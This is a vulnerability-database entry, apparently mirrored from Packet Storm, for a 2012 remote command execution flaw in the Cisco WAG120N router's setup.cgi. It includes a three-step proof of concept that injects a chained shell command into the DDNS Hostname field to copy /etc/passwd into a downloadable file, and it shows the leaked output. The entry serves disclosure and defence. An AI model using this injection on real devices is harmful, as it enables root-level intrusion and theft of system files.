ID
VAR-E-201211-0596
TITLE
Cisco WAG120N Command Execution
Trust: 0.5
DESCRIPTION
Cisco WAG120N suffers from a remote command execution vulnerability in setup.cgi.
Trust: 0.5
AFFECTED PRODUCTS
| vendor: | cisco | model: | wag120n | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Hello, here you have a quick POC in three simple steps
# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fern\xe1ndez Fern\xe1ndez (thesur@itsm3.com)
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)
1\xba Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2\xba All the fields you see are vulnerables to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3\xba Everything is done, just download the file /Routercfg.cfg (Authenticated
is requiered)
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
--
Manuel Fern\xe1ndez
Trust: 0.5
EXPLOIT HASH
LOCAL | SOURCE | ||||||||
|
|
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
| tag: | exploit | Trust: 0.5 |
| tag: | remote | Trust: 0.5 |
| tag: | cgi | Trust: 0.5 |
CREDITS
Manu
Trust: 0.5
EXTERNAL IDS
| db: | PACKETSTORM | id: | 118320 | Trust: 0.5 |
SOURCES
| db: | PACKETSTORM | id: | 118320 |
LAST UPDATE DATE
2022-07-27T09:32:57.334000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 118320 | date: | 2012-11-23T17:05:54 |